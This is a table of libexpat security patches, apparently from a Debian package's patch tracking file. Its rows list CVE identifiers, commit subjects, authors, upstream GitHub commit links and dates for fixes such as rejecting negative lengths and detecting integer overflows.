CVE-2023-52425/15-d5b02e9.patch | xmlwf: Document argument "-q" | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/d5b02e96ab95d2a7ae0aea72d00054b9d036d76d | 2023-11-09 |
CVE-2024-45490/01-5c1a316.patch | lib: Reject negative len for XML_ParseBuffer Reported by TaiYou |
Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/5c1a31642e243f4870c0bd1f2afc7597976521bf | 2024-08-19 |
CVE-2024-45490/02-c12f039.patch | tests: Cover "len < 0" for both XML_Parse and XML_ParseBuffer | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/c12f039b8024d6b9a11c20858370495ff6ff5245 | 2024-08-20 |
CVE-2024-45490/03-2db2330.patch | doc: Document that XML_Parse/XML_ParseBuffer reject "len < 0" | Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/2db233019f551fe4c701bbbc5eb0fa58ff349daa | 2024-08-25 |
CVE-2024-45491.patch | lib: Detect integer overflow in dtdCopy Reported by TaiYou |
Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/8e439a9947e9dc80a395c0c7456545d8d9d9e421 | 2024-08-19 |
CVE-2024-45492.patch | lib: Detect integer overflow in function nextScaffoldPart Reported by TaiYou |
Sebastian Pipping <sebastian@pipping.org> | yes | debian upstream | https://github.com/libexpat/libexpat/commit/9bf0f2c16ee86f644dd1432507edff94c08dc232 | 2024-08-19 |